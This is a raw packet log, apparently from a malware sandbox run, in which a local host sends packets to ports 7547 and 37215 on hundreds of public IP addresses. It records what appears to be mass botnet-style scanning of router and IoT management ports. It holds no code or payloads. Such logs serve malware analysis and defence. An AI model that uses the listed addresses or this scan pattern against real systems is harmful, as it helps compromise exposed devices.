                                          Nov 7, 2024 11:57:58.397339106 CET30567547192.168.2.13199.58.155.75
                                          Nov 7, 2024 11:57:58.397351027 CET75473056216.224.7.248192.168.2.13
                                          Nov 7, 2024 11:57:58.397356987 CET30567547192.168.2.13167.210.14.28
                                          Nov 7, 2024 11:57:58.397357941 CET7547305646.158.79.209192.168.2.13
                                          Nov 7, 2024 11:57:58.397363901 CET75473056193.23.8.185192.168.2.13
                                          Nov 7, 2024 11:57:58.397366047 CET7547305623.91.39.87192.168.2.13
                                          Nov 7, 2024 11:57:58.397367954 CET3070437215192.168.2.1341.228.119.159
                                          Nov 7, 2024 11:57:58.397371054 CET75473056170.242.186.244192.168.2.13
                                          Nov 7, 2024 11:57:58.397373915 CET3070437215192.168.2.1341.237.66.134
                                          Nov 7, 2024 11:57:58.397377968 CET75473056118.8.12.219192.168.2.13
                                          Nov 7, 2024 11:57:58.397383928 CET75473056110.211.19.120192.168.2.13
                                          Nov 7, 2024 11:57:58.397391081 CET7547305682.217.130.144192.168.2.13
                                          Nov 7, 2024 11:57:58.397393942 CET3070437215192.168.2.1341.21.184.78
                                          Nov 7, 2024 11:57:58.397393942 CET30567547192.168.2.1346.158.79.209
                                          Nov 7, 2024 11:57:58.397396088 CET3070437215192.168.2.1341.164.118.245
                                          Nov 7, 2024 11:57:58.397398949 CET7547305661.64.58.161192.168.2.13
                                          Nov 7, 2024 11:57:58.397402048 CET3070437215192.168.2.1341.171.15.116
                                          Nov 7, 2024 11:57:58.397404909 CET75473056188.192.33.17192.168.2.13
                                          Nov 7, 2024 11:57:58.397406101 CET30567547192.168.2.13193.23.8.185
                                          Nov 7, 2024 11:57:58.397408009 CET75473056200.216.17.231192.168.2.13
                                          Nov 7, 2024 11:57:58.397412062 CET30567547192.168.2.1323.91.39.87
                                          Nov 7, 2024 11:57:58.397412062 CET30567547192.168.2.13118.8.12.219
                                          Nov 7, 2024 11:57:58.397413969 CET7547305688.52.144.208192.168.2.13
                                          Nov 7, 2024 11:57:58.397417068 CET30567547192.168.2.13110.211.19.120
                                          Nov 7, 2024 11:57:58.397417068 CET3070437215192.168.2.1341.149.138.152
                                          Nov 7, 2024 11:57:58.397418022 CET30567547192.168.2.13170.242.186.244
                                          Nov 7, 2024 11:57:58.397419930 CET7547305643.168.39.9192.168.2.13
                                          Nov 7, 2024 11:57:58.397420883 CET30567547192.168.2.13216.224.7.248
                                          Nov 7, 2024 11:57:58.397424936 CET3070437215192.168.2.1341.202.184.217
                                          Nov 7, 2024 11:57:58.397425890 CET7547305644.213.15.85192.168.2.13
                                          Nov 7, 2024 11:57:58.397430897 CET3070437215192.168.2.1341.182.13.31
                                          Nov 7, 2024 11:57:58.397430897 CET3070437215192.168.2.1341.157.88.227
                                          Nov 7, 2024 11:57:58.397433043 CET30567547192.168.2.1382.217.130.144
                                          Nov 7, 2024 11:57:58.397433996 CET3070437215192.168.2.1341.86.27.49
                                          Nov 7, 2024 11:57:58.397433996 CET30567547192.168.2.1361.64.58.161
                                          Nov 7, 2024 11:57:58.397433996 CET3070437215192.168.2.1341.239.160.85
                                          Nov 7, 2024 11:57:58.397439957 CET30567547192.168.2.1388.52.144.208
                                          Nov 7, 2024 11:57:58.397440910 CET75473056143.249.137.26192.168.2.13
                                          Nov 7, 2024 11:57:58.397442102 CET30567547192.168.2.13188.192.33.17
                                          Nov 7, 2024 11:57:58.397454023 CET75473056143.242.231.169192.168.2.13
                                          Nov 7, 2024 11:57:58.397455931 CET30567547192.168.2.13200.216.17.231
                                          Nov 7, 2024 11:57:58.397455931 CET3070437215192.168.2.1341.52.27.224
                                          Nov 7, 2024 11:57:58.397459030 CET3070437215192.168.2.1341.106.164.221
                                          Nov 7, 2024 11:57:58.397460938 CET3070437215192.168.2.1341.35.134.119
                                          Nov 7, 2024 11:57:58.397461891 CET30567547192.168.2.1343.168.39.9
                                          Nov 7, 2024 11:57:58.397461891 CET30567547192.168.2.1344.213.15.85
                                          Nov 7, 2024 11:57:58.397466898 CET75473056144.182.249.102192.168.2.13
                                          Nov 7, 2024 11:57:58.397469997 CET30567547192.168.2.13143.249.137.26
                                          Nov 7, 2024 11:57:58.397479057 CET3070437215192.168.2.1341.231.191.99
                                          Nov 7, 2024 11:57:58.397480011 CET3070437215192.168.2.1341.82.231.101
                                          Nov 7, 2024 11:57:58.397480965 CET7547305646.229.152.199192.168.2.13
                                          Nov 7, 2024 11:57:58.397488117 CET30567547192.168.2.13143.242.231.169
                                          Nov 7, 2024 11:57:58.397494078 CET7547305675.183.209.41192.168.2.13
                                          Nov 7, 2024 11:57:58.397496939 CET30567547192.168.2.13144.182.249.102
                                          Nov 7, 2024 11:57:58.397501945 CET3070437215192.168.2.1341.239.248.110
                                          Nov 7, 2024 11:57:58.397509098 CET30567547192.168.2.1346.229.152.199
                                          Nov 7, 2024 11:57:58.397509098 CET3070437215192.168.2.1341.98.233.240
                                          Nov 7, 2024 11:57:58.397516012 CET3070437215192.168.2.1341.61.207.49
                                          Nov 7, 2024 11:57:58.397519112 CET30567547192.168.2.1375.183.209.41
                                          Nov 7, 2024 11:57:58.397531986 CET3070437215192.168.2.1341.114.158.148
                                          Nov 7, 2024 11:57:58.397535086 CET3070437215192.168.2.1341.87.226.3
                                          Nov 7, 2024 11:57:58.397542953 CET3070437215192.168.2.1341.77.128.97
                                          Nov 7, 2024 11:57:58.397552013 CET3070437215192.168.2.1341.39.146.74
                                          Nov 7, 2024 11:57:58.397552967 CET3070437215192.168.2.1341.12.74.15
                                          Nov 7, 2024 11:57:58.397566080 CET3070437215192.168.2.1341.151.193.16
                                          Nov 7, 2024 11:57:58.397568941 CET3070437215192.168.2.1341.119.50.15
                                          Nov 7, 2024 11:57:58.397572041 CET3070437215192.168.2.1341.140.118.101
                                          Nov 7, 2024 11:57:58.397598028 CET3070437215192.168.2.1341.8.205.136
                                          Nov 7, 2024 11:57:58.397598982 CET3070437215192.168.2.1341.159.142.154
                                          Nov 7, 2024 11:57:58.397609949 CET3070437215192.168.2.1341.210.184.92
                                          Nov 7, 2024 11:57:58.397614956 CET3070437215192.168.2.1341.7.40.107
                                          Nov 7, 2024 11:57:58.397622108 CET3070437215192.168.2.1341.124.103.110
                                          Nov 7, 2024 11:57:58.397623062 CET3070437215192.168.2.1341.130.21.137
                                          Nov 7, 2024 11:57:58.397624969 CET3070437215192.168.2.1341.21.101.197
                                          Nov 7, 2024 11:57:58.397630930 CET75473056135.130.179.126192.168.2.13
                                          Nov 7, 2024 11:57:58.397640944 CET3070437215192.168.2.1341.11.120.233
                                          Nov 7, 2024 11:57:58.397645950 CET75473056159.248.124.230192.168.2.13
                                          Nov 7, 2024 11:57:58.397655964 CET3070437215192.168.2.1341.34.102.55
                                          Nov 7, 2024 11:57:58.397656918 CET3070437215192.168.2.1341.14.17.213
                                          Nov 7, 2024 11:57:58.397659063 CET75473056163.7.213.125192.168.2.13
                                          Nov 7, 2024 11:57:58.397658110 CET30567547192.168.2.13135.130.179.126
                                          Nov 7, 2024 11:57:58.397667885 CET3070437215192.168.2.1341.18.64.46
                                          Nov 7, 2024 11:57:58.397671938 CET30567547192.168.2.13159.248.124.230
                                          Nov 7, 2024 11:57:58.397680044 CET3070437215192.168.2.1341.229.205.103
                                          Nov 7, 2024 11:57:58.397696972 CET30567547192.168.2.13163.7.213.125
                                          Nov 7, 2024 11:57:58.397697926 CET3070437215192.168.2.1341.209.240.116
                                          Nov 7, 2024 11:57:58.397697926 CET3070437215192.168.2.1341.65.112.218
                                          Nov 7, 2024 11:57:58.397711039 CET3070437215192.168.2.1341.140.68.228
                                          Nov 7, 2024 11:57:58.397720098 CET3070437215192.168.2.1341.64.19.140
                                          Nov 7, 2024 11:57:58.397722960 CET7547305687.74.210.177192.168.2.13
                                          Nov 7, 2024 11:57:58.397727013 CET3070437215192.168.2.1341.15.242.188
                                          Nov 7, 2024 11:57:58.397737026 CET7547305689.88.8.86192.168.2.13
                                          Nov 7, 2024 11:57:58.397742033 CET3070437215192.168.2.1341.91.230.5
                                          Nov 7, 2024 11:57:58.397749901 CET75473056220.47.31.232192.168.2.13
                                          Nov 7, 2024 11:57:58.397754908 CET3070437215192.168.2.1341.174.80.212
                                          Nov 7, 2024 11:57:58.397757053 CET3070437215192.168.2.1341.53.208.5
                                          Nov 7, 2024 11:57:58.397763014 CET75473056164.67.111.183192.168.2.13
                                          Nov 7, 2024 11:57:58.397773027 CET30567547192.168.2.1387.74.210.177
                                          Nov 7, 2024 11:57:58.397774935 CET30567547192.168.2.1389.88.8.86
                                          Nov 7, 2024 11:57:58.397783041 CET3070437215192.168.2.1341.150.96.202
                                          Nov 7, 2024 11:57:58.397783041 CET30567547192.168.2.13220.47.31.232
                                          Nov 7, 2024 11:57:58.397785902 CET7547305671.254.190.14192.168.2.13
                                          Nov 7, 2024 11:57:58.397797108 CET3070437215192.168.2.1341.131.220.159
                                          Nov 7, 2024 11:57:58.397799015 CET75473056141.151.90.91192.168.2.13
                                          Nov 7, 2024 11:57:58.397799969 CET3070437215192.168.2.1341.41.33.233
                                          Nov 7, 2024 11:57:58.397810936 CET75473056183.59.129.150192.168.2.13
                                          Nov 7, 2024 11:57:58.397814989 CET30567547192.168.2.1371.254.190.14
                                          Nov 7, 2024 11:57:58.397825003 CET3070437215192.168.2.1341.182.182.58
                                          Nov 7, 2024 11:57:58.397825956 CET30567547192.168.2.13164.67.111.183
                                          Nov 7, 2024 11:57:58.397825956 CET3070437215192.168.2.1341.75.7.39
                                          Nov 7, 2024 11:57:58.397825956 CET30567547192.168.2.13141.151.90.91
                                          Nov 7, 2024 11:57:58.397834063 CET75473056157.4.219.114192.168.2.13
                                          Nov 7, 2024 11:57:58.397840023 CET30567547192.168.2.13183.59.129.150
                                          Nov 7, 2024 11:57:58.397840023 CET3070437215192.168.2.1341.194.132.179
                                          Nov 7, 2024 11:57:58.397845984 CET75473056217.63.48.206192.168.2.13
                                          Nov 7, 2024 11:57:58.397856951 CET3070437215192.168.2.1341.55.225.45
                                          Nov 7, 2024 11:57:58.397860050 CET7547305654.8.114.143192.168.2.13
                                          Nov 7, 2024 11:57:58.397862911 CET3070437215192.168.2.1341.32.19.205
                                          Nov 7, 2024 11:57:58.397866011 CET30567547192.168.2.13157.4.219.114
                                          Nov 7, 2024 11:57:58.397876978 CET30567547192.168.2.13217.63.48.206
                                          Nov 7, 2024 11:57:58.397882938 CET75473056111.181.107.200192.168.2.13
                                          Nov 7, 2024 11:57:58.397882938 CET3070437215192.168.2.1341.54.78.233
                                          Nov 7, 2024 11:57:58.397895098 CET75473056151.92.176.195192.168.2.13
                                          Nov 7, 2024 11:57:58.397900105 CET30567547192.168.2.1354.8.114.143
                                          Nov 7, 2024 11:57:58.397907972 CET7547305663.214.81.242192.168.2.13
                                          Nov 7, 2024 11:57:58.397914886 CET30567547192.168.2.13111.181.107.200
                                          Nov 7, 2024 11:57:58.397918940 CET3070437215192.168.2.1341.152.254.115
                                          Nov 7, 2024 11:57:58.397918940 CET3070437215192.168.2.1341.145.48.129
                                          Nov 7, 2024 11:57:58.397923946 CET75473056170.246.41.239192.168.2.13
                                          Nov 7, 2024 11:57:58.397924900 CET3070437215192.168.2.1341.213.228.195
                                          Nov 7, 2024 11:57:58.397933960 CET3070437215192.168.2.1341.210.180.106
                                          Nov 7, 2024 11:57:58.397937059 CET7547305660.50.40.24192.168.2.13
                                          Nov 7, 2024 11:57:58.397937059 CET3070437215192.168.2.1341.52.247.44
                                          Nov 7, 2024 11:57:58.397938967 CET30567547192.168.2.13151.92.176.195
                                          Nov 7, 2024 11:57:58.397938967 CET30567547192.168.2.1363.214.81.242
                                          Nov 7, 2024 11:57:58.397948027 CET30567547192.168.2.13170.246.41.239
                                          Nov 7, 2024 11:57:58.397950888 CET75473056200.220.184.47192.168.2.13
                                          Nov 7, 2024 11:57:58.397965908 CET75473056119.15.235.117192.168.2.13
                                          Nov 7, 2024 11:57:58.397978067 CET75473056207.191.93.18192.168.2.13
                                          Nov 7, 2024 11:57:58.397978067 CET30567547192.168.2.1360.50.40.24
                                          Nov 7, 2024 11:57:58.397978067 CET3070437215192.168.2.1341.234.194.80
                                          Nov 7, 2024 11:57:58.397983074 CET3070437215192.168.2.1341.42.133.224
                                          Nov 7, 2024 11:57:58.397990942 CET75473056113.16.91.104192.168.2.13
                                          Nov 7, 2024 11:57:58.397991896 CET30567547192.168.2.13200.220.184.47
                                          Nov 7, 2024 11:57:58.397991896 CET30567547192.168.2.13119.15.235.117
                                          Nov 7, 2024 11:57:58.397994041 CET3070437215192.168.2.1341.161.59.225
                                          Nov 7, 2024 11:57:58.398013115 CET75473056154.243.140.107192.168.2.13
                                          Nov 7, 2024 11:57:58.398021936 CET30567547192.168.2.13207.191.93.18
                                          Nov 7, 2024 11:57:58.398024082 CET75473056179.156.39.112192.168.2.13
                                          Nov 7, 2024 11:57:58.398027897 CET30567547192.168.2.13113.16.91.104
                                          Nov 7, 2024 11:57:58.398036957 CET7547305625.180.136.110192.168.2.13
                                          Nov 7, 2024 11:57:58.398040056 CET3070437215192.168.2.1341.74.35.81
                                          Nov 7, 2024 11:57:58.398040056 CET3070437215192.168.2.1341.41.128.89
                                          Nov 7, 2024 11:57:58.398047924 CET30567547192.168.2.13154.243.140.107
                                          Nov 7, 2024 11:57:58.398049116 CET75473056196.82.25.195192.168.2.13
                                          Nov 7, 2024 11:57:58.398052931 CET3070437215192.168.2.1341.56.23.204
                                          Nov 7, 2024 11:57:58.398056030 CET3070437215192.168.2.1341.106.187.91
                                          Nov 7, 2024 11:57:58.398056030 CET30567547192.168.2.13179.156.39.112
                                          Nov 7, 2024 11:57:58.398058891 CET3070437215192.168.2.1341.201.40.159
                                          Nov 7, 2024 11:57:58.398067951 CET7547305645.86.223.252192.168.2.13
                                          Nov 7, 2024 11:57:58.398073912 CET3070437215192.168.2.1341.93.105.144
                                          Nov 7, 2024 11:57:58.398081064 CET7547305694.211.181.228192.168.2.13
                                          Nov 7, 2024 11:57:58.398081064 CET3070437215192.168.2.1341.225.8.174
                                          Nov 7, 2024 11:57:58.398083925 CET3070437215192.168.2.1341.40.148.215
                                          Nov 7, 2024 11:57:58.398088932 CET30567547192.168.2.13196.82.25.195
                                          Nov 7, 2024 11:57:58.398099899 CET30567547192.168.2.1345.86.223.252
                                          Nov 7, 2024 11:57:58.398113012 CET30567547192.168.2.1394.211.181.228
                                          Nov 7, 2024 11:57:58.398113966 CET30567547192.168.2.1325.180.136.110
                                          Nov 7, 2024 11:57:58.398116112 CET3070437215192.168.2.1341.224.70.63
                                          Nov 7, 2024 11:57:58.398122072 CET3070437215192.168.2.1341.180.54.40
                                          Nov 7, 2024 11:57:58.398133993 CET3070437215192.168.2.1341.204.96.136
                                          Nov 7, 2024 11:57:58.398133993 CET3070437215192.168.2.1341.218.92.218
                                          Nov 7, 2024 11:57:58.398149014 CET3070437215192.168.2.1341.10.197.86
                                          Nov 7, 2024 11:57:58.398171902 CET3070437215192.168.2.1341.154.24.158
                                          Nov 7, 2024 11:57:58.398171902 CET3070437215192.168.2.1341.238.58.193
                                          Nov 7, 2024 11:57:58.398178101 CET3070437215192.168.2.1341.245.121.56
                                          Nov 7, 2024 11:57:58.398178101 CET3070437215192.168.2.1341.97.23.38
                                          Nov 7, 2024 11:57:58.398179054 CET3070437215192.168.2.1341.157.19.240
                                          Nov 7, 2024 11:57:58.398183107 CET3070437215192.168.2.1341.207.69.185
                                          Nov 7, 2024 11:57:58.398183107 CET3070437215192.168.2.1341.12.171.164
                                          Nov 7, 2024 11:57:58.398211002 CET3070437215192.168.2.1341.131.141.124
                                          Nov 7, 2024 11:57:58.398214102 CET3070437215192.168.2.1341.95.113.182
                                          Nov 7, 2024 11:57:58.398231030 CET3070437215192.168.2.1341.66.250.46
                                          Nov 7, 2024 11:57:58.398236036 CET3070437215192.168.2.1341.235.61.97
                                          Nov 7, 2024 11:57:58.398236036 CET3070437215192.168.2.1341.185.66.3
                                          Nov 7, 2024 11:57:58.398246050 CET3070437215192.168.2.1341.204.133.152
                                          Nov 7, 2024 11:57:58.398262978 CET3070437215192.168.2.1341.169.134.73
                                          Nov 7, 2024 11:57:58.398262978 CET3070437215192.168.2.1341.131.191.33
                                          Nov 7, 2024 11:57:58.398267031 CET3070437215192.168.2.1341.23.150.229
                                          Nov 7, 2024 11:57:58.398273945 CET3070437215192.168.2.1341.50.179.200
                                          Nov 7, 2024 11:57:58.398298979 CET3070437215192.168.2.1341.173.13.31
                                          Nov 7, 2024 11:57:58.398304939 CET3070437215192.168.2.1341.30.223.158
                                          Nov 7, 2024 11:57:58.398309946 CET3070437215192.168.2.1341.84.235.70
                                          Nov 7, 2024 11:57:58.398317099 CET3070437215192.168.2.1341.48.138.56
                                          Nov 7, 2024 11:57:58.398324013 CET3070437215192.168.2.1341.9.222.48
                                          Nov 7, 2024 11:57:58.398330927 CET3070437215192.168.2.1341.45.116.250
                                          Nov 7, 2024 11:57:58.398330927 CET3070437215192.168.2.1341.203.204.226
                                          Nov 7, 2024 11:57:58.398354053 CET3070437215192.168.2.1341.198.219.49
                                          Nov 7, 2024 11:57:58.398355961 CET3070437215192.168.2.1341.58.227.96
                                          Nov 7, 2024 11:57:58.398371935 CET3070437215192.168.2.1341.125.17.121
                                          Nov 7, 2024 11:57:58.398374081 CET3070437215192.168.2.1341.137.110.109
                                          Nov 7, 2024 11:57:58.398390055 CET3070437215192.168.2.1341.71.220.137
                                          Nov 7, 2024 11:57:58.398391962 CET3070437215192.168.2.1341.126.232.216
                                          Nov 7, 2024 11:57:58.398394108 CET3070437215192.168.2.1341.150.213.102
                                          Nov 7, 2024 11:57:58.398406029 CET3070437215192.168.2.1341.15.51.185
                                          Nov 7, 2024 11:57:58.398408890 CET3070437215192.168.2.1341.89.253.184
                                          Nov 7, 2024 11:57:58.398416042 CET3070437215192.168.2.1341.241.76.108
                                          Nov 7, 2024 11:57:58.398421049 CET3070437215192.168.2.1341.207.175.10
                                          Nov 7, 2024 11:57:58.398447990 CET3070437215192.168.2.1341.21.9.206
                                          Nov 7, 2024 11:57:58.398456097 CET3070437215192.168.2.1341.155.219.171
                                          Nov 7, 2024 11:57:58.398456097 CET3070437215192.168.2.1341.210.28.156
                                          Nov 7, 2024 11:57:58.398462057 CET3070437215192.168.2.1341.222.175.225
                                          Nov 7, 2024 11:57:58.398473024 CET3070437215192.168.2.1341.140.231.27
                                          Nov 7, 2024 11:57:58.398473024 CET3070437215192.168.2.1341.225.60.177
                                          Nov 7, 2024 11:57:58.398478985 CET3070437215192.168.2.1341.104.21.94
                                          Nov 7, 2024 11:57:58.398494959 CET3070437215192.168.2.1341.46.174.246
                                          Nov 7, 2024 11:57:58.398498058 CET3070437215192.168.2.1341.117.76.193
                                          Nov 7, 2024 11:57:58.398514032 CET3070437215192.168.2.1341.27.225.155
                                          Nov 7, 2024 11:57:58.398525000 CET3070437215192.168.2.1341.209.170.67
                                          Nov 7, 2024 11:57:58.398535967 CET3070437215192.168.2.1341.16.38.46
                                          Nov 7, 2024 11:57:58.398535967 CET3070437215192.168.2.1341.207.220.150
                                          Nov 7, 2024 11:57:58.398547888 CET3070437215192.168.2.1341.167.217.69
                                          Nov 7, 2024 11:57:58.398555040 CET3070437215192.168.2.1341.12.81.41
                                          Nov 7, 2024 11:57:58.398561001 CET3070437215192.168.2.1341.16.180.198
                                          Nov 7, 2024 11:57:58.398565054 CET7547305612.227.129.205192.168.2.13
                                          Nov 7, 2024 11:57:58.398575068 CET3070437215192.168.2.1341.54.217.204
                                          Nov 7, 2024 11:57:58.398580074 CET75473056125.224.153.83192.168.2.13
                                          Nov 7, 2024 11:57:58.398592949 CET7547305636.100.155.213192.168.2.13
                                          Nov 7, 2024 11:57:58.398600101 CET30567547192.168.2.1312.227.129.205
                                          Nov 7, 2024 11:57:58.398606062 CET75473056168.91.93.207192.168.2.13
                                          Nov 7, 2024 11:57:58.398607969 CET3070437215192.168.2.1341.190.203.9
                                          Nov 7, 2024 11:57:58.398617029 CET30567547192.168.2.13125.224.153.83
                                          Nov 7, 2024 11:57:58.398621082 CET7547305649.118.84.185192.168.2.13
                                          Nov 7, 2024 11:57:58.398627043 CET30567547192.168.2.1336.100.155.213
                                          Nov 7, 2024 11:57:58.398627043 CET30567547192.168.2.13168.91.93.207
                                          Nov 7, 2024 11:57:58.398636103 CET75473056183.17.244.147192.168.2.13
                                          Nov 7, 2024 11:57:58.398636103 CET3070437215192.168.2.1341.209.122.120
                                          Nov 7, 2024 11:57:58.398637056 CET3070437215192.168.2.1341.238.17.182
                                          Nov 7, 2024 11:57:58.398638010 CET3070437215192.168.2.1341.29.137.141
                                          Nov 7, 2024 11:57:58.398638010 CET3070437215192.168.2.1341.33.138.102
                                          Nov 7, 2024 11:57:58.398652077 CET7547305696.117.154.154192.168.2.13
                                          Nov 7, 2024 11:57:58.398657084 CET3070437215192.168.2.1341.159.220.244
                                          Nov 7, 2024 11:57:58.398658991 CET30567547192.168.2.1349.118.84.185
                                          Nov 7, 2024 11:57:58.398663998 CET3070437215192.168.2.1341.46.208.70
                                          Nov 7, 2024 11:57:58.398663998 CET3070437215192.168.2.1341.136.166.93
                                          Nov 7, 2024 11:57:58.398667097 CET3070437215192.168.2.1341.112.134.229
                                          Nov 7, 2024 11:57:58.398668051 CET3070437215192.168.2.1341.169.199.173
                                          Nov 7, 2024 11:57:58.398672104 CET30567547192.168.2.13183.17.244.147
                                          Nov 7, 2024 11:57:58.398674011 CET7547305687.255.173.58192.168.2.13
                                          Nov 7, 2024 11:57:58.398679972 CET3070437215192.168.2.1341.198.49.27
                                          Nov 7, 2024 11:57:58.398679972 CET30567547192.168.2.1396.117.154.154
                                          Nov 7, 2024 11:57:58.398686886 CET75473056212.189.208.120192.168.2.13
                                          Nov 7, 2024 11:57:58.398700953 CET75473056168.224.216.61192.168.2.13
                                          Nov 7, 2024 11:57:58.398711920 CET7547305650.87.7.55192.168.2.13
                                          Nov 7, 2024 11:57:58.398715973 CET30567547192.168.2.1387.255.173.58
                                          Nov 7, 2024 11:57:58.398716927 CET30567547192.168.2.13212.189.208.120
                                          Nov 7, 2024 11:57:58.398725033 CET75473056112.195.60.88192.168.2.13
                                          Nov 7, 2024 11:57:58.398731947 CET75473056131.163.155.211192.168.2.13
                                          Nov 7, 2024 11:57:58.398736954 CET3070437215192.168.2.1341.90.156.77
                                          Nov 7, 2024 11:57:58.398739100 CET75473056125.174.179.196192.168.2.13
                                          Nov 7, 2024 11:57:58.398744106 CET3070437215192.168.2.1341.105.187.31
                                          Nov 7, 2024 11:57:58.398744106 CET3070437215192.168.2.1341.222.144.7
                                          Nov 7, 2024 11:57:58.398745060 CET7547305619.99.100.131192.168.2.13
                                          Nov 7, 2024 11:57:58.398744106 CET3070437215192.168.2.1341.242.122.50
                                          Nov 7, 2024 11:57:58.398747921 CET3070437215192.168.2.1341.165.6.172
                                          Nov 7, 2024 11:57:58.398755074 CET75473056120.40.32.246192.168.2.13
                                          Nov 7, 2024 11:57:58.398760080 CET3070437215192.168.2.1341.174.177.31
                                          Nov 7, 2024 11:57:58.398761034 CET75473056149.74.215.82192.168.2.13
                                          Nov 7, 2024 11:57:58.398761988 CET30567547192.168.2.13168.224.216.61
                                          Nov 7, 2024 11:57:58.398761988 CET3070437215192.168.2.1341.236.197.90
                                          Nov 7, 2024 11:57:58.398770094 CET7547305642.60.65.173192.168.2.13
                                          Nov 7, 2024 11:57:58.398775101 CET3070437215192.168.2.1341.97.64.220
                                          Nov 7, 2024 11:57:58.398776054 CET3070437215192.168.2.1341.130.140.242
                                          Nov 7, 2024 11:57:58.398782015 CET7547305641.214.75.116192.168.2.13
                                          Nov 7, 2024 11:57:58.398781061 CET3070437215192.168.2.1341.211.165.214
                                          Nov 7, 2024 11:57:58.398783922 CET3070437215192.168.2.1341.66.71.70
                                          Nov 7, 2024 11:57:58.398788929 CET30567547192.168.2.1350.87.7.55
                                          Nov 7, 2024 11:57:58.398792028 CET30567547192.168.2.13131.163.155.211
                                          Nov 7, 2024 11:57:58.398796082 CET7547305696.15.231.52192.168.2.13
                                          Nov 7, 2024 11:57:58.398796082 CET30567547192.168.2.13125.174.179.196
                                          Nov 7, 2024 11:57:58.398801088 CET30567547192.168.2.13112.195.60.88
                                          Nov 7, 2024 11:57:58.398804903 CET30567547192.168.2.13120.40.32.246
                                          Nov 7, 2024 11:57:58.398822069 CET30567547192.168.2.1342.60.65.173
                                          Nov 7, 2024 11:57:58.398823023 CET3070437215192.168.2.1341.74.45.167
                                          Nov 7, 2024 11:57:58.398834944 CET3070437215192.168.2.1341.189.74.58
                                          Nov 7, 2024 11:57:58.398838043 CET30567547192.168.2.13149.74.215.82
                                          Nov 7, 2024 11:57:58.398838997 CET30567547192.168.2.1341.214.75.116
                                          Nov 7, 2024 11:57:58.398838997 CET3070437215192.168.2.1341.35.232.89
                                          Nov 7, 2024 11:57:58.398839951 CET3070437215192.168.2.1341.232.87.122
                                          Nov 7, 2024 11:57:58.398838997 CET30567547192.168.2.1319.99.100.131
                                          Nov 7, 2024 11:57:58.398838997 CET3070437215192.168.2.1341.110.249.89
                                          Nov 7, 2024 11:57:58.398852110 CET3070437215192.168.2.1341.59.49.76
                                          Nov 7, 2024 11:57:58.398854017 CET3070437215192.168.2.1341.125.0.76
                                          Nov 7, 2024 11:57:58.398857117 CET3070437215192.168.2.1341.112.241.48
                                          Nov 7, 2024 11:57:58.398858070 CET3070437215192.168.2.1341.243.7.15
                                          Nov 7, 2024 11:57:58.398859024 CET30567547192.168.2.1396.15.231.52
                                          Nov 7, 2024 11:57:58.398871899 CET3070437215192.168.2.1341.45.175.128
                                          Nov 7, 2024 11:57:58.398875952 CET3070437215192.168.2.1341.91.224.182
                                          Nov 7, 2024 11:57:58.398875952 CET3070437215192.168.2.1341.83.94.45
                                          Nov 7, 2024 11:57:58.398878098 CET3070437215192.168.2.1341.207.147.229
                                          Nov 7, 2024 11:57:58.398885012 CET3070437215192.168.2.1341.29.240.9
                                          Nov 7, 2024 11:57:58.398896933 CET3070437215192.168.2.1341.143.150.56
                                          Nov 7, 2024 11:57:58.398914099 CET3070437215192.168.2.1341.65.170.213
                                          Nov 7, 2024 11:57:58.398914099 CET3070437215192.168.2.1341.69.181.21
                                          Nov 7, 2024 11:57:58.398916006 CET3070437215192.168.2.1341.126.14.191
                                          Nov 7, 2024 11:57:58.398916006 CET3070437215192.168.2.1341.101.166.18
                                          Nov 7, 2024 11:57:58.398930073 CET3070437215192.168.2.1341.238.243.249
                                          Nov 7, 2024 11:57:58.398935080 CET3070437215192.168.2.1341.235.87.108
                                          Nov 7, 2024 11:57:58.398936987 CET3070437215192.168.2.1341.152.124.43
                                          Nov 7, 2024 11:57:58.398941040 CET3070437215192.168.2.1341.85.186.158
                                          Nov 7, 2024 11:57:58.398952961 CET3070437215192.168.2.1341.219.136.229
                                          Nov 7, 2024 11:57:58.398968935 CET3070437215192.168.2.1341.79.182.6
                                          Nov 7, 2024 11:57:58.398968935 CET3070437215192.168.2.1341.205.142.151
                                          Nov 7, 2024 11:57:58.398974895 CET3070437215192.168.2.1341.136.202.238
                                          Nov 7, 2024 11:57:58.398977995 CET3070437215192.168.2.1341.196.16.29
                                          Nov 7, 2024 11:57:58.398977995 CET3070437215192.168.2.1341.144.242.47
                                          Nov 7, 2024 11:57:58.398992062 CET3070437215192.168.2.1341.228.68.144
                                          Nov 7, 2024 11:57:58.398999929 CET3070437215192.168.2.1341.188.16.108
                                          Nov 7, 2024 11:57:58.399004936 CET3070437215192.168.2.1341.64.79.198
                                          Nov 7, 2024 11:57:58.399012089 CET3070437215192.168.2.1341.136.82.189
                                          Nov 7, 2024 11:57:58.399019003 CET3070437215192.168.2.1341.6.111.162
                                          Nov 7, 2024 11:57:58.399020910 CET3070437215192.168.2.1341.216.218.168
                                          Nov 7, 2024 11:57:58.399043083 CET3070437215192.168.2.1341.31.78.177
                                          Nov 7, 2024 11:57:58.399066925 CET3070437215192.168.2.1341.89.21.87
                                          Nov 7, 2024 11:57:58.399070024 CET3070437215192.168.2.1341.238.128.252
                                          Nov 7, 2024 11:57:58.399074078 CET3070437215192.168.2.1341.65.204.142
                                          Nov 7, 2024 11:57:58.399079084 CET3070437215192.168.2.1341.237.195.159
                                          Nov 7, 2024 11:57:58.399079084 CET3070437215192.168.2.1341.87.221.173
                                          Nov 7, 2024 11:57:58.399079084 CET3070437215192.168.2.1341.142.103.98
                                          Nov 7, 2024 11:57:58.399094105 CET3070437215192.168.2.1341.247.84.108
                                          Nov 7, 2024 11:57:58.399095058 CET3070437215192.168.2.1341.59.138.56
                                          Nov 7, 2024 11:57:58.399095058 CET3070437215192.168.2.1341.46.101.110
                                          Nov 7, 2024 11:57:58.399099112 CET3070437215192.168.2.1341.50.121.90
                                          Nov 7, 2024 11:57:58.399099112 CET3070437215192.168.2.1341.132.60.255
                                          Nov 7, 2024 11:57:58.399104118 CET75473056161.243.235.100192.168.2.13
                                          Nov 7, 2024 11:57:58.399105072 CET3070437215192.168.2.1341.31.156.191
                                          Nov 7, 2024 11:57:58.399111986 CET3070437215192.168.2.1341.130.198.93
                                          Nov 7, 2024 11:57:58.399117947 CET754730565.95.37.45192.168.2.13
                                          Nov 7, 2024 11:57:58.399131060 CET75473056169.58.8.202192.168.2.13
                                          Nov 7, 2024 11:57:58.399137020 CET30567547192.168.2.13161.243.235.100
                                          Nov 7, 2024 11:57:58.399144888 CET75473056143.237.119.157192.168.2.13
                                          Nov 7, 2024 11:57:58.399158001 CET75473056219.166.35.46192.168.2.13
                                          Nov 7, 2024 11:57:58.399161100 CET30567547192.168.2.135.95.37.45
                                          Nov 7, 2024 11:57:58.399164915 CET3070437215192.168.2.1341.233.70.77
